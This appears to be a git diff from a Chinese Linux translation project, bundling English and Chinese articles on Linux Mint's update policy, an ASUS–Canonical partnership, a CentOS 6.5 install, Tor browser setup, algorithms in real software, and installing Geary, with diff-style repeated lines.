Canonical Dev Calls Linux Mint ‘Vulnerable’, Wouldn’t Use it For Online Banking
**Users of the popular Ubuntu-based operating system Linux Mint should not use it for online banking, a Canonical [engineer has advised][1].**
> Linux Mint has since responded to the comments by Oliver Grawert. [You can read them here][1].
Mint’s decision to prevent packages with known security issues from updating – from the kernel and browser to the boot-loader and Xorg display server – leaves its users with a “vulnerable system”, says Oliver Grawert.
**Users of the popular Ubuntu-based operating system Linux Mint should not use it for online banking, a Canonical [engineer has advised][2].**
Mint’s decision to prevent packages with known security issues from updating – from the kernel and browser to the boot-loader and Xorg display server – leaves its users with a “vulnerable system”, says *Oliver Grawert*.
> “Instead of just integrating changes properly with the packages in the ubuntu archive they instead suppress doing (security) updates at all for them. i would say forcefully keeping a vulnerable kernel browser or xorg in place instead of allowing the provided security updates to be installer makes it a vulnerable system, (sic)”.
> “I personally wouldn’t do online banking with it.”
Grawert certainly isn’t alone in considering Mint a sub-par choice for the security conscious. Mozilla contributor and former Ubuntu member **Benjamin Kerensa*** feels the same:
Grawert certainly isn’t alone in considering Mint a sub-par choice for the security conscious. Mozilla contributor and former Ubuntu member Benjamin **Kerensa* feels the same:**
> “It is unclear why Linux Mint disables all of their security updates. I can say that it took them many months to get a fixed version of Firefox packaged while Ubuntu and Debian had already had security fixes in their package.
@ -16,7 +18,7 @@ Grawert certainly isn’t alone in considering Mint a sub-par choice for the sec
Oliver Grawert is no fly-by-night contributor. As one of Canonical’s Ubuntu Engineering bods he’s better placed than most to know what he’s talking about.
**‘But are Mint users in actual risk? Yes and no…’**
> ‘But are Mint users in actual risk? Yes and no…’
But are Mint users in actual risk?
@ -28,7 +30,7 @@ But just because no-one has entered through the window left ajar thus far, isn
**After seeing Ubuntu given a long and sustained kicking about its own (largely theoretical) privacy issues, it will be interesting to see if, now the boot is placed firmly on the other foot, the vehement concern for users’ wellbeing will extend to other distributions. **
*Notice: We reached out to Linux Mint for comment & clarification but received no reply.*
Notice: We reached out to Linux Mint for comment & clarification but received no reply.
@ -38,4 +40,5 @@ via: http://www.omgubuntu.co.uk/2013/11/canonical-dev-dont-use-linux-mint-online
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[1]:这个地址在发布的时候填写成“Linux Mint Respond to Ubuntu Developer’s ‘Vulnerable’ Claim”这篇文章的发布的地址
@ -0,0 +1,29 @@
Canonical and ASUS Have Formed a Partnership in USA
**Canonical and ASUS have formed a partnership that would enable the hardware vendor to equip a couple of its laptops with the Ubuntu operating system.**
ASUS is now providing the X201E and 1015E laptops with Ubuntu preinstalled in an effort to penetrate the education market.
“As Ubuntu, and all the software bundled on it is free, there’s no licence fees in the purchase price which significantly reduces cost. This is perfect for students and institutions, both of whose finances can be hard pressed.”
“Productivity applications are taken care of by LibreOffice. Familiar feeling, they offer all the functionality students and staff need and are fully compatible with existing files from the leading proprietary alternative. There are also bundled free applications for email and web browsing,” reads the official [announcement][1] on Ubuntu’s website.
The two laptops are not exactly powerhouses and are aimed at productivity, and maybe multimedia content. The ASUS 1015E laptop features a Intel Celeron 847 1.1 GHz processor, 2 GB DDR3 Memory, a 320 GB 5400 rpm Hard Drive, and a 10.1-Inch screen.
The other model, which is currently out of stock, ASUS X201E, is a little bit more powerful, but not by much: Intel Celeron 847 (1.1GHz) Sandy Bridge processor, 4 GB DDR3, 320 GB 5400 rpm Hard Drive, an 11.6-Inch screen, and Intel GMA HD graphics solution.
“Beyond the basics thousands of other free, open-source applications are available to meet more specific needs from image processing and 3D animation to anti-virus or accounting.”
“We know that effective personal computing is vital to students and Institutions, so it’s exciting for us to work with our partners to bring these low-cost, high-performance packages into the education sector,” is also stated in the announcement.
Canonical announcement sends to a couple of Amazon pages, but if you’re interested in these products than you should know that they are available in a number of other stores.
via: http://news.softpedia.com/news/Canonical-and-ASUS-Have-Formed-a-Partnership-in-USA-404483.shtml
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CentOS 6.5 desktop installation guide with screenshots
### CentOS 6.5 released ###
Following with the release of RHEL 6.5, [CentOS 6.5 has arrived][1] on 1st Dec and its time to play with it. For those who want to update their existing 6.4 systems to 6.5 simply use the "yum update" command and all the magic would be done.
CentOS 6.5 has received some package updates as well as new features. Check out the [release notes][2] for detailed information.
### Major updates ###
> The Precision Time Protocol - previously a technology preview - is now fully supported. The following drivers support network time stamping: bnx2x, tg3, e1000e, igb, ixgbe, and sfc.
> OpenSSL has been updated to version 1.0.1.
> OpenSSL and NSS now support TLS 1.1 and 1.2.
> KVM received various enhancements. These include improved read-only support of VMDK- and VHDX-Files, CPU hot plugging and updated virt-v2v-/virt-p2v-conversion tools.
> Hyper-V and VMware drivers have been updated.
> Updates to Evolution (2.32) and Libre Office (4.0.4).
### Download ###
In this post we shall be installing it on the desktop. Head to either of the following urls
Select your machine architecture and it will then present a list of mirrors. Get into any mirror and then get the torrent file to download or the direct iso download link. There are multiple download options available like LiveCD, LiveDVD, Dvd1+2, Minimal and Netinstall.
The minimal installer comes with a text based installer that would install CentOS with a shell and minimum software applications. Rest everything has to be installed from yum.
The LiveCD/LiveDVD provide the desktop and gui installer and installs the CentOS system but does not provide any package selection options.
The DvD1+2 set provide full set of all applications for those who need it.
And the netinstall would actually download the installation image and then install.
In this post we shall use the LiveCD. It is around 650MB.
Although CentOS is used mostly on servers, having a desktop system can help to create a gui based environment with a setup similar to your server. We shall be trying out the minimal and netinstall installation methods in another post.
### Install ###
So now, its time to install CentOS onto your desktop system. Use either the LiveDVD or LiveCD to get it up and running fast.
1. Put in the media and reboot. The boot menu will have many options with self explanatory names. Select Boot to get onto the Live desktop.

2. Double clicks the Install icon on the desktop, to start the Anaconda installer.

3. Click Next on the installer wizard.

4. **Keyboard layout** - The next step would ask you to select the keyboard layout which should be USA for most english users.

5. **Storage type** - After the keyboard layout, comes the option select the type of storage on which CentOS is to be installed. For local hard drives, its Basic storage.

6. **Hostname** - In the next step the anaconda installer asks for a hostname. So fill it appropriately. If not sure, just enter something like mypc or hplaptop.

7. **Timezone** - Then comes the timezone selection

8. **Root Password** - Next in turn is the root password which, as you know should be a strong one.

9. **Formatting** - Now the wizard would like to know, how you wan't to format the storage device. If you want to format the drive yourself, then select "Custom Layout" and create partitions as needed. For the sake of this tutorial we are selecting the first option, that is to use the entire device and let CentOS format it as it likes.

10. **Copying files** - Now the installer will start copying files. Nothing to do here except wait and watch. The LiveCD installer basically copies the CD image to the hard drive. You do not get any option to select packages to install or omit. Also the liveCD somes with a minimal collection of software and applications.

### Post install configuration ###
11. After the installation completes and reboots, the welcome wizard would come up which would further configure the system.

12. License Agreement - Like all software centos too comes with a license that is very minimal and only a few lines. So accept it.

13. **Create User** - Now its time to create a user account for yourself to be able to use the system.

14. **Current date & time** - Now input the current date and time and select the option to synchronize over the network.

15. **Kdump** - This is the last step of the welcome wizard that asks whether kdump should be enabled or not. It is a good idea to enable it.

### Start CentOS 6.5 ###
After the previous step, the system would be rebooted, and finally comes the login page.

And after login comes the shiny new CentOS 6.5 desktop

Hope you enjoyed reading the installation guide. Leave your comments and questions below.
### Resource ###
CentOS 6.5 release notes
via: http://www.binarytides.com/centos-6-5-installation-screenshots/
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Configure Your Browser To Use Tor On Ubuntu/Debian/Linux Mint
**Tor**, **T**he **O**nion **R**outer, is a network of Virtual Tunnels that allows users to communicate securely and as well as anonymously over Internet. Tor allows organizations and individuals to share information over public networks without compromising their privacy. We can use Tor to keep websites from tracking us and also our family members, or to connect to news sites, instant messaging services, or the websites which are blocked by the Internet providers and Network Administrators.
Tor was originally designed, implemented, and deployed as a third-generation [onion routing project of the U.S. Naval Research Laboratory][1]. It was originally developed with the U.S. Navy in mind, for the primary purpose of protecting government communications. Today, it is used every day for a wide variety of purposes by normal people, the military, journalists, law enforcement officers, activists, and many others.
In this quick how-to let us learn how to use Tor with our browsers. The steps provided here were tested on Ubuntu 13.04 Desktop, but it should work on all Debian/Ubuntu and its derivatives.
### Install Tor & Vidalia On Ubuntu / Debian / Linux Mint ###
Tor is available in the default repositories of Debian/Ubuntu, but they might be bit outdated. So add Tor repository to your distribution source lists.
Edit file **/etc/apt/sources.list**,
$ sudo nano /etc/apt/sources.list
Add the following lines depending upon your distribution version. As i am testing this on my Ubuntu 13.04 desktop, i added the following lines.
deb http://deb.torproject.org/torproject.org raring main
Save and close the file. If you’re using Ubuntu 13.10, then the lines should be,
deb http://deb.torproject.org/torproject.org saucy main
For Debian 7 Wheezy,
deb http://deb.torproject.org/torproject.org wheezy main
Add the gpg key using following commands:
$ gpg --keyserver keys.gnupg.net --recv 886DDD89
$ gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
Update the repository list and install vidalia using commands:
$ sudo apt-get update
$ sudo apt-get install tor vidalia deb.torproject.org-keyring
During installation, you’ll be asked which user should be able to control Tor service. Select the user and click Ok.

Now Vidalia is installed and running.
### Configure Firefox Browser ###
Open your browser. Go to **Edit -> Preferences -> Advanced -> Network ->Settings**. Select manual Proxy Configuration. In the SOCKS Host column, enter **localhost** or **** and in the port column enter **9050** as shown in the below screenshot.

Now point your browser with URL **https://check.torproject.org/**. You will see a green message that indicates: “**Congratulations. This browser is configured to use Tor**”. Red message indicate that Tor is not setup. Refer the following screenshot.

The same settings are applicable for all browsers, just open the Browser settings/preferences window, find the Network settings, Enter **** in proxy server column and **9050** in port box. To disable Tor, Select **Use System Proxy settings** on browser settings.
**Note**: If you want to use Tor for anonymous web browsing, please read our article about [Tor Browser Bundle][2]. It comes with readily configured Tor and a browser patched for better anonymity. To use SOCKS directly (for instant messaging, Jabber, IRC, etc), you can point your application directly at Tor (localhost port 9050), but see [this FAQ entry][3] for why this may be dangerous.
That’s it. Good Luck! Stay Safe!
via: http://www.unixmen.com/configure-browser-use-tor-ubuntu-debian-linux-mint/
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本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
@ -1,289 +0,0 @@
### Linux内核中的基本数据结构和算法 ###
链接在这里([source code on github][1])。
1.[链表][2], [双向链表][3], [无锁链表][4]。
2.[B+ 树][5]的注释会告诉你无法在教科书上找到的东西。
> A relatively simple B+Tree implementation. I have written it as a learning exercise to understand how B+Trees work. Turned out to be useful as well.
> ...
> A tricks was used that is not commonly found in textbooks. The lowest values are to the right, not to the left. All used slots within a node are on the left, all unused slots contain NUL values. Most operations simply loop once over all slots and terminate on the first NUL.
3.[优先排序列表][6] 用于 [互斥量][7]、[驱动][8]等等。
> A common use of the radix tree is to store pointers to struct pages;
> Simple insertion-only static-sized priority heap containing pointers, based on CLR, chapter 7
> Knuth recommends primes in approximately golden ratio to the maximum integer representable by a machine word for multiplicative hashing. Chuck Lever verified the effectiveness of this technique:
> [http://www.citi.umich.edu/techreports/reports/citi-tr-00-1.pdf][17]
> These primes are chosen to be bit-sparse, that is operations on them can use shifts and additions instead of multiplications for machines where multiplications are slow.
> hash function using a Rotating Hash algorithm
> Knuth, D. The Art of Computer Programming, Volume 3: Sorting and Searching, Chapter 6.4. Addison Wesley, 1973
> Performs a modified depth-first walk of the namespace tree, starting (and ending) at the node specified by start_handle. The callback function is called whenever a node that matches the type parameter is found. If the callback function returns a non-zero value, the search is terminated immediately and this value is returned to the caller.
19.[Knuth-Morris-Pratt 字符串匹配][36],
> Implements a linear-time string-matching algorithm due to Knuth, Morris, and Pratt [1]. Their algorithm avoids the explicit computation of the transition function DELTA altogether. Its matching time is O(n), for n being length(text), using just an auxiliary function PI[1..m], for m being length(pattern), precomputed from the pattern in time O(m). The array PI allows the transition function DELTA to be computed efficiently "on the fly" as needed. Roughly speaking, for any state "q" = 0,1,...,m and any character "a" in SIGMA, the value PI["q"] contains the information that is independent of "a" and is needed to compute DELTA("q", "a") 2. Since the array PI has only m entries, whereas DELTA has O(m|SIGMA|) entries, we save a factor of |SIGMA| in the preprocessing time by computing PI rather than DELTA.
> [1] Cormen, Leiserson, Rivest, Stein Introdcution to Algorithms, 2nd Edition, MIT Press
> [2] See finite automation theory
20.[Boyer-Moore 模式匹配][37]是在找替代品时的参考和建议。
> Implements Boyer-Moore string matching algorithm:
> [1] A Fast String Searching Algorithm, R.S. Boyer and Moore. Communications of the Association for Computing Machinery, 20(10), 1977, pp. 762-772. [http://www.cs.utexas.edu/users/moore/publications/fstrpos.pdf][38]
> [2] Handbook of Exact String Matching Algorithms, Thierry Lecroq, 2004 [http://www-igm.univ-mlv.fr/~lecroq/string/string.pdf][39]
> Note: Since Boyer-Moore (BM) performs searches for matchings from right to left, it's still possible that a matching could be spread over multiple blocks, in that case this algorithm won't find any coincidence.
> If you're willing to ensure that such thing won't ever happen, use the Knuth-Pratt-Morris (KMP) implementation instead. In conclusion, choose the proper string search algorithm depending on your setting.
> Say you're using the textsearch infrastructure for filtering, NIDS or
> any similar security focused purpose, then go KMP. Otherwise, if you really care about performance, say you're classifying packets to apply Quality of Service (QoS) policies, and you don't mind about possible matchings spread over multiple fragments, then go BM.
### Chromium 浏览器中的数据结构和算法 ###
链接在这里([source code on Google code][40])。我只会列出一部分。我建议使用搜索来找到你最喜欢的算法或者数据结构。
> The tree is also parameterized by an allocation policy (Allocator). The policy is used for allocating lists in the C free store or the zone; see zone.h.
2.[Voronoi diagrams][42]用于一个示例。
> Conclusion of Julian Walker
> Red black trees are interesting beasts. They're believed to be simpler than AVL trees (their direct competitor), and at first glance this seems to be the case because insertion is a breeze. However, when one begins to play with the deletion algorithm, red black trees become very tricky. However, the counterweight to this added complexity is that both insertion and deletion can be implemented using a single pass, top-down algorithm. Such is not the case with AVL trees, where only the insertion algorithm can be written top-down. Deletion from an AVL tree requires a bottom-up algorithm.
> ...
> Red black trees are popular, as most data structures with a whimsical name. For example, in Java and C++, the library map structures are typically implemented with a red black tree. Red black trees are also comparable in speed to AVL trees. While the balance is not quite as good, the work it takes to maintain balance is usually better in a red black tree. There are a few misconceptions floating around, but for the most part the hype about red black trees is accurate.
3.[AVL 树][46]
7.[Bresenham 算法][50].
### 编程语言库 ###
1.[C++ STL][51]包含了链表、栈、队列、map、向量和对[排序][52]、[搜索和堆操作][53]算法。
2.[Java API][54]是非常广阔的并且覆盖了更多。
3.[Boost C++ 库][55]包含了像 Boyer-Moore以及Knuth-Morris-Pratt字符串匹配算法。
### 分配和调度算法 ###
4.[Richard Carr][58]的[时钟算法][57]用于Linux中的页面替换。
5.Intel i860处理器是一种随即替代策略。
### *nix系统核心工具 ###
4.*GNU grep*,根据作者Mike Haertel实现了[Boyer-Mooresuan算法][65]。
6.[*Unix diff*][66]由Doug McIllroy实现,基于和James Hunt合作编写的圆形。它比用于计算Levenshtein距离的标准动态规划算法执行地更好。[Linux 版本][67]计算最短编辑距离。
### 加密算法 ###
1.[Merkle 树][68],特别是 Tiger Tree Hash变种,被用于点对点应用,比如[GTK Gnutella][69]和[LimeWire][70]。
2.[MD5][71]被用于提供软件包的校验和并被用于在*nix系统上的完整性检测(([Linux 实现][72])),同样也在Windows和OSX中支持。
### 编译器 ###
1.[LALR 解析][74]用yacc和bison实现。
### 压缩和图像处理 ###
### 冲突驱动语句学习算法 (CDCL)###
自2000以来,SAT求解器在工业标准的运行时间(通常是硬件工业,虽然其他地方也被使用)以近乎指数的方式每年下跌。这发展中很重要的一部分是冲突驱动语句学习算法,它结合了Davis Logemann和Loveland在约束规划和人工智能研究中关于语句学习的原始论文中的布尔约束传播算法。特定地,工业造型,SAT被认为是一个简单的问题([见这个讨论][77])。对我而言,这个一个最近最好的成功故事因为它结合了这几年算法的前进推广、聪明的工程理念、实验性的评估、齐心协力地解决一个问题。[Malik and Zhang的CACM文章][78]值得阅读。这个算法在许多大学中教授(我参加了4个地方都是如此),但是通常在一个逻辑或者形式方法课上。
via: http://cstheory.stackexchange.com/questions/19759/core-algorithms-deployed/19773#19773
译者:[geekpi](https://github.com/geekpi) 校对:[校对者ID](https://github.com/校对者ID)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
@ -1,46 +0,0 @@
Daily Ubuntu Tips – Get Geary, A Lightweight Email Reader In Ubuntu
As you may already know, Ubuntu comes with its own email client called Thunderbird that allows you to setup email accounts to send and receive emails. It also support IMAP protocol which services like Gmail, Yahoo Mail and Microsoft Outlook support.
Thunderbird is a great email client and does everything an email client supposed to do, but if you’re looking for an alternative that is lightweight and built around GNOME, then you may want to try Geary.
Geary is a free email program that lets you quickly and effortlessly read emails with a simple interface based around conversations. The entire discuss is read from a single pane without you having to click from one message to another.
Geary also support IMAP protocol which will let you send and receive emails using your online webmail accounts from Google, Yahoo and Microsoft.
For users with Ubuntu 13.10, Geary is already available from Ubuntu Software Center. All they have to do is run the commands below to install Geary.
sudo apt-get install geary
For previous versions of Ubuntu, press **Ctrl – Alt – T** on your keyboard to open the terminal. When opens, run the commands below to add its PPA repository.
sudo add-apt-repository ppa:yorba/ppa
Next, run the commands below to update your system and install Geary.
sudo apt-get update && sudo apt-get install geary
When you launch Geary the first time, it wants you to setup email accounts from Gmail, Yahoo or Microsoft.

The setup is pretty easy, just enter your account info and Geary will attempt to automatically configure your account.
To uninstall Geary, first remove its PPA repository from your system by running the commands below.
sudo add-apt-repository -r ppa:yorba/ppa
Then run the commands below to remove Geary.
sudo apt-get remove geary
That’s it.
via: http://www.liberiangeek.net/2013/11/daily-ubuntu-tips-get-geary-a-lightweight-email-reader-in-ubuntu/
译者:[译者ID](https://github.com/译者ID) 校对:[校对者ID](https://github.com/校对者ID)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
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